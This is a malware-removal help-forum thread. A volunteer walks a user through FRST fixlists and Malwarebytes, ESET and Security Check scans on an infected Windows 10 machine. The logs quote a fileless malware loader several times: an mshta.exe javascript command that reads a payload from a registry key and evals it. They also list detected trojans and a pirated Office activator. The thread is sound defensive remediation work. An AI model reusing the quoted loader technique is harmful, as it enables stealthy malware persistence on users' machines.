HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1"
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Classes\57dc5d: "C:\Windows\system32\mshta.exe" "javascript:lx8WWw="ZnEX4BKK";S3z=new ActiveXObject("WScript.Shell");TzdVX4B="m06zK9Pp";m69MBW=S3z.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");zqIc6Ih="L8";eval(m69MBW);BGHyV7x6G="n5Gny4";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 07:04 - 2015-07-10 07:02 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
26-08-2016 22:26:12 Removed Microsoft Office Professional Plus 2013
26-08-2016 22:27:03 PROPLUS
27-08-2016 03:55:09 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
Name: Microsoft PS/2 Mouse
Description: Microsoft PS/2 Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/27/2016 03:55:13 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (08/26/2016 10:27:07 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (08/26/2016 10:26:26 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (08/26/2016 05:11:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-A6RCKOD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (08/25/2016 08:49:53 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-A6RCKOD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (08/25/2016 08:39:02 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Microsoft.Photos.exe version 1.0.1607.22006 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 964
 
Start Time: 01d1ff30cbb1d2b2
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
 
Report Id: 78a189a3-6b25-11e6-9bd7-408d5c7291e8
 
Faulting package full name: Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: App
 
Error: (08/25/2016 12:51:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-A6RCKOD)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (08/24/2016 09:06:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.10240.17071, time stamp: 0x2a425e19
Faulting module name: ntdll.dll, version: 10.0.10240.16841, time stamp: 0x5708ac9e
Exception code: 0xc0000374
Fault offset: 0x000d628c
Faulting process id: 0x1b90
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/24/2016 01:12:13 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 31204
 
Error: (08/24/2016 01:12:13 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 31204
 
 
System errors:
=============
Error: (08/27/2016 04:04:37 AM) (Source: Application Popup) (EventID: 56) (User: )
Description: ACPI5
 
Error: (08/27/2016 04:04:00 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (08/27/2016 04:03:54 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: 
%%1056 = An instance of the service is already running.
 
Error: (08/27/2016 04:03:24 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The iPod Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (08/27/2016 04:03:24 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (08/27/2016 04:03:22 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA Network Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (08/27/2016 04:03:22 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA Streamer Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (08/27/2016 04:03:22 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MSI Live Update Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (08/27/2016 04:03:22 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The McAfee SiteAdvisor Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 3000 milliseconds: Restart the service.
 
Error: (08/27/2016 04:03:21 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA GeForce Experience Service service terminated unexpectedly.  It has done this 1 time(s).
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-6600K CPU @ 3.50GHz
Percentage of memory in use: 26%
Total physical RAM: 8144.67 MB
Available physical RAM: 6001.67 MB
Total Virtual: 9424.67 MB
Available Virtual: 7352.54 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:931.02 GB) (Free:884.69 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 63D94302)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

  • 0

#18
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

note: it did the same error message as before upon restart up


Hello :)

That's because the first step was not done properly. You posted the fixlist instead of running FRST and then posting the fixlog that will be produced. Please follow the instructions below and post the log upon completion.


Step 1: Fix with FRST

Please note: Before performing this step, please move FRST64.exe from C:\Users\Ryan\Downloads to your Desktop or the fix will not work.
  • Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
  • Right-click in the open notepad and select Paste).
  • Save it on the desktop as fixlist.txt

    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [AXworks] => regsvr32.exe C:\Users\Ryan\AppData\Local\AXworks\AtlInterval.dll <===== ATTENTION
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [Eltion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Ryan\AppData\Local\Eqtion\CnxCcSupport.dll
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [**qterhqnqq<*>] => "C:\Users\Ryan\AppData\Local\751c12\230b29.lnk" <===== ATTENTION (Value Name with invalid characters)
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160818.017\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160818.017\EX64.SYS [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
C:\ProgramData\@000001.dat
ActiveXObject("WScript.Shell");TzdVX4B="m06zK9Pp";m69MBW=S3z.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");zqIc6Ih="L8";eval(m69MBW);BGHyV7x6G="n5Gny4";" <===== ATTENTION
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

  • 0

#19
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
Fix result of Farbar Recovery Scan Tool (x64) Version: 27-08-2016
Ran by Ryan (27-08-2016 18:23:14) Run:1
Running from C:\Users\Ryan\Desktop
Loaded Profiles: Ryan (Available Profiles: Ryan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [AXworks] => regsvr32.exe C:\Users\Ryan\AppData\Local\AXworks\AtlInterval.dll <===== ATTENTION
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [Eltion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Ryan\AppData\Local\Eqtion\CnxCcSupport.dll
HKU\S-1-5-21-868973554-806322924-1075547668-1002\...\Run: [**qterhqnqq<*>] => "C:\Users\Ryan\AppData\Local\751c12\230b29.lnk" <===== ATTENTION (Value Name with invalid characters)
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160818.017\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20160818.017\EX64.SYS [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
C:\ProgramData\@000001.dat
ActiveXObject("WScript.Shell");TzdVX4B="m06zK9Pp";m69MBW=S3z.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");zqIc6Ih="L8";eval(m69MBW);BGHyV7x6G="n5Gny4";" <===== ATTENTION
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Microsoft\Windows\CurrentVersion\Run\\AXworks => value removed successfully
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Eltion => value removed successfully
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**qterhqnqq<*> => value removed successfully
MSICDSetup => service removed successfully
NAVENG => service removed successfully
NAVEX15 => service removed successfully
NTIOLib_1_0_C => service removed successfully
wfpcapture => service removed successfully
C:\ProgramData\@000001.dat => moved successfully
ActiveXObject("WScript.Shell");TzdVX4B="m06zK9Pp";m69MBW=S3z.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");zqIc6Ih="L8";eval(m69MBW);BGHyV7x6G="n5Gny4";" <===== ATTENTION => Error: No automatic fix found for this entry.
 
========= netsh advfirewall reset =========
 
Ok.
 
 
========= End of CMD: =========
 
 
========= netsh advfirewall set allprofiles state on =========
 
Ok.
 
 
========= End of CMD: =========
 
 
========= ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9714530 B
Java, Flash, Steam htmlcache => 4703 B
Windows/system/drivers => 3745946 B
Edge => 5591218 B
Chrome => 794220109 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 259 B
systemprofile32 => 206166 B
LocalService => 13878 B
NetworkService => 13022 B
Ryan => 3061903336 B
 
RecycleBin => 2612761 B
EmptyTemp: => 3.6 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 18:28:20 ====

  • 0

#20
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello :)

That got it, but we I have one small item I need to remove, and we can scan for remnants. At the moment, the board is experiencing some issues that will not allow me to post further instructions. I will post them as soon as the issue is resolved. Thank you for your patience. :thumbsup:
  • 0

#21
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello :)

Looks like the issue with the board is resolved for the time being. :thumbsup:

Step 1: Fix with FRST
  • Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
  • Right-click in the open notepad and select Paste).
  • Save it on the desktop as fixlist.txt

    HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Classes\57dc5d: "C:\Windows\system32\mshta.exe" "javascript:lx8WWw="ZnEX4BKK";S3z=new ActiveXObject("WScript.Shell");TzdVX4B="m06zK9Pp";m69MBW=S3z.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");zqIc6Ih="L8";eval(m69MBW);BGHyV7x6G="n5Gny4";" <===== ATTENTION



    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.



Step 2: Scan with Malwarebytes

Download Malwarebytes Anti-Malware by clicking here.
Start the program and select Update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

MBAMsettings_zpsb6b9ada0.jpg

Go back to the Dashboard and select Scan Now

mbam21-console_zpslhr5hawa.jpg

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

MBAMReboot_zps9089ab30.jpg

MBAMLog_zpsade07f42.jpg

On completion of the scan (or after the reboot), start MBAM,

Click History, then Application Logs, then check the Select box by the first Scan Log in the list and then click on the log to highlight it.

Click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.



Step 3: ESET Online Virus Scan

Please note: You can use Internet Explorer or Firefox for this step.

If you use Firefox, you will be prompted to download esetsmartinstaller_enu.exe. Please do so, then double click it to install it.

Please click on this link and then click the ESET Online Scanner bar ---->esetbar_zps93905f48.jpg
  • Select the option YES, I accept the Terms of Use then click on Start
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked.
  • Make sure that the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
  • Scan for potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth Technology
  • Now click on Start
  • The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically. The scan may take several hours.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • Now click on Finish
  • To view the log file, Show hidden files and folders must be enabled. New logs are appended to the existing log files when multiple scans are run.
  • The path to the log file is the following: C:\users\%userprofile%\appdata\local\temp\log.txt
  • Copy and paste that log as a reply to this topic.
Step 4: Security Check

Please download Security Check by screen317 to your Desktop by clicking here.

Once downloaded, double click the program and follow the prompts.

Once finished, the program will produce a log called checkup.txt

Please post that log in your next reply.

Things I need to see in your next post:
  • Fixlog.txt Log
  • ESET Scan Log
  • MBAM Log
  • SecurityCheck Log

  • 0

#22
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
Fix result of Farbar Recovery Scan Tool (x64) Version: 28-08-2016
Ran by Ryan (29-08-2016 10:38:21) Run:2
Running from C:\Users\Ryan\Desktop
Loaded Profiles: Ryan (Available Profiles: Ryan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Classes\57dc5d: "C:\Windows\system32\mshta.exe" "javascript:lx8WWw="ZnEX4BKK";S3z=new ActiveXObject("WScript.Shell");TzdVX4B="m06zK9Pp";m69MBW=S3z.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");zqIc6Ih="L8";eval(m69MBW);BGHyV7x6G="n5Gny4";" <===== ATTENTION
*****************
 
"HKU\S-1-5-21-868973554-806322924-1075547668-1002\Software\Classes\57dc5d" => key removed successfully
 
==== End of Fixlog 10:38:21 ====

  • 0

#23
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
11:06:50 Updating
11:06:50 Update Init
11:06:52 Update Download
11:07:03 Call m_esets_charon_send
11:07:03 Call m_esets_charon_destroy
11:07:21 Updating
11:07:21 Update Init
11:07:27 Update Download
11:11:24 esets_scanner_reload returned 0
11:11:24 g_uiModuleBuild: 30576
11:11:24 Update Finalize
11:11:24 Call m_esets_charon_send
11:11:24 Call m_esets_charon_destroy
11:11:24 Updated modules version: 30576
11:11:33 Call m_esets_charon_setup_create
11:11:33 Call m_esets_charon_create
11:11:33 m_esets_charon_create OK
11:11:33 Call m_esets_charon_start_send_thread
11:11:33 Call m_esets_charon_setup_set
11:11:33 m_esets_charon_setup_set OK
11:11:33 Scanner engine: 30576
17:37:58 # product=EOS
# version=8
# flags=0
# esetonlinescanner_enu.exe=2.0.12.0
# EOSSerial=6f5f77391d6d2f46a3ad40ac0a4bd2c1
# engine=30576
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# sfx_checked=true
# utc_time=2016-08-29 21:37:57
# local_time=2016-08-29 17:37:57 (-0500, Eastern Daylight Time)
# country="United States"
# lang=1033
# osver=6.2.9200 NT 
# compatibility_mode_1='McAfee Anti-Virus and Anti-Spyware'
# compatibility_mode=5123 16777214 88 94 779633 56519663 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 0 35059089 0 0
# scanned=2
# found=3
# cleaned=0
# scan_time=23191
sh=C338C00648AD9A025B58595529A45DC055682C88 ft=1 fh=0000000000000000 vn="a variant of Win32/Kryptik.FFAO trojan" ac=I fn="C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmp16CC.exe"
sh=882C17AD9974111D73CFD5CFE25AFCB408BABFA7 ft=1 fh=0000000000000000 vn="a variant of Win32/Kryptik.FEWQ trojan" ac=I fn="C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmpF187.exe"
sh=FA174424FD41763CD308683F7275554838E11E72 ft=1 fh=0000000000000000 vn="a variant of MSIL/HackKMS.G potentially unsafe application" ac=I fn="C:\Users\Ryan\Downloads\[]Microsoft Office Professional Plus (x64) 2013 Incl  Activator  P2P\Microsoft Toolkit.exe"
17:51:45 Call m_esets_charon_send
17:51:45 Call m_esets_charon_destroy

  • 0

#24
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/29/2016
Scan Time: 10:43 AM
Logfile: mbam.txt
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2016.08.29.06
Rootkit Database: v2016.08.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: Ryan
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 308378
Time Elapsed: 13 min, 19 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 3
Trojan.BrowserMe, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATE.EXE, Quarantined, [fdddf35d306ad95dc9e7eaebfd0523dd], 
Trojan.BrowserMe, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\GOOGLEUPDATE.EXE, Quarantined, [fdddf35d306ad95dc9e7eaebfd0523dd], 
Rootkit.Fileless.MTGen, HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\57DC5D\SHELL\OPEN\COMMAND, Quarantined, [ca10eb655644cc6add0a39c4a65dfd03], 
 
Registry Values: 5
Backdoor.Sathurbot, HKU\S-1-5-21-868973554-806322924-1075547668-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Windows Performance Monitor, rundll32.exe "C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\PerformanceMonitor.dll",DllInstall, Quarantined, [e8f2005085150e28cfeb655c11f305fb]
Trojan.BrowserMe, HKU\S-1-5-21-868973554-806322924-1075547668-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|BrowserUpdate, C:\Users\Ryan\AppData\Roaming\BrowserMe\GoogleUpdate.exe, Quarantined, [fdddf35d306ad95dc9e7eaebfd0523dd]
Trojan.BrowserMe, HKU\S-1-5-21-868973554-806322924-1075547668-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|BrowserMe, C:\Users\Ryan\AppData\Roaming\BrowserMe\GoogleUpdate.exe, Quarantined, [fdddf35d306ad95dc9e7eaebfd0523dd]
Trojan.Fileless.MTGen, HKU\S-1-5-21-868973554-806322924-1075547668-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^qterhqnqq, Quarantined, [f0ea9fb122782d0934b6cb34e320fe02], 
Rootkit.Fileless.MTGen, HKU\S-1-5-21-868973554-806322924-1075547668-1002_Classes\57dc5d\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:m4U9Vz="5HJ7vsrP";z0a=new ActiveXObject("WScript.Shell");On76Xk="vA2C0Sj";rL9I9w=z0a.RegRead("HKCU\\software\\jdgutjnrjd\\ryzduu");sc5CiKxC="Jy1jf7J";eval(rL9I9w);T0ZoXS5a="c";", Quarantined, [ca10eb655644cc6add0a39c4a65dfd03]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 6
Backdoor.Sathurbot, C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\PerformanceMonitor.dll, Quarantined, [e8f2005085150e28cfeb655c11f305fb], 
Trojan.Miuref.Generic, C:\Users\Ryan\AppData\Local\AXworks\astHelpSched80.dll, Quarantined, [479371dfa1f9ec4a19219b430ef3c63a], 
Trojan.Miuref.Generic, C:\Users\Ryan\AppData\Local\AXworks\AtlInterval.dll, Quarantined, [9743321e4b4fd2641a202eb048b9a957], 
Trojan.Miuref.Generic, C:\Users\Ryan\AppData\Local\AXworks\SystemEnum16.dll, Quarantined, [7e5cea665248b97d99a1b02e827f827e], 
Trojan.BrowserMe, C:\Users\Ryan\AppData\Roaming\BrowserMe\GoogleUpdate.exe, Quarantined, [fdddf35d306ad95dc9e7eaebfd0523dd], 
Rootkit.Fileless.MTGen, C:\Users\Ryan\AppData\Local\751c12\ed6901.bat, Quarantined, [00da3e12d9c174c2babec3da63a1ba46], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

  • 0

#25
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender                     
McAfee Anti-Virus and Anti-Spyware   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Google Chrome 31.0.1650.59 Google Chrome out of date!  
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 

  • 0

Advertisements


#26
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts

i can not find the checkup.txt from the security check.


  • 0

#27
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts

i can not find the checkup.txt from the security check.


Hello :)

No worries, it opened automatically and you posted it in post #25. :thumbsup:

Let's remove the items that ESET found, and then we'll have some cleanup procedures to go through.

Step1: Fix with FRST
  • Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
  • Right-click in the open notepad and select Paste).
  • Save it on the desktop as fixlist.txt

    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmp16CC.exe
C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmpF187.exe
C:\Users\Ryan\Downloads\[]Microsoft Office Professional Plus (x64) 2013 Incl Activator P2P\Microsoft Toolkit.exe
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

  • 0

#28
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
Fix result of Farbar Recovery Scan Tool (x64) Version: 29-08-2016
Ran by Ryan (30-08-2016 13:28:24) Run:3
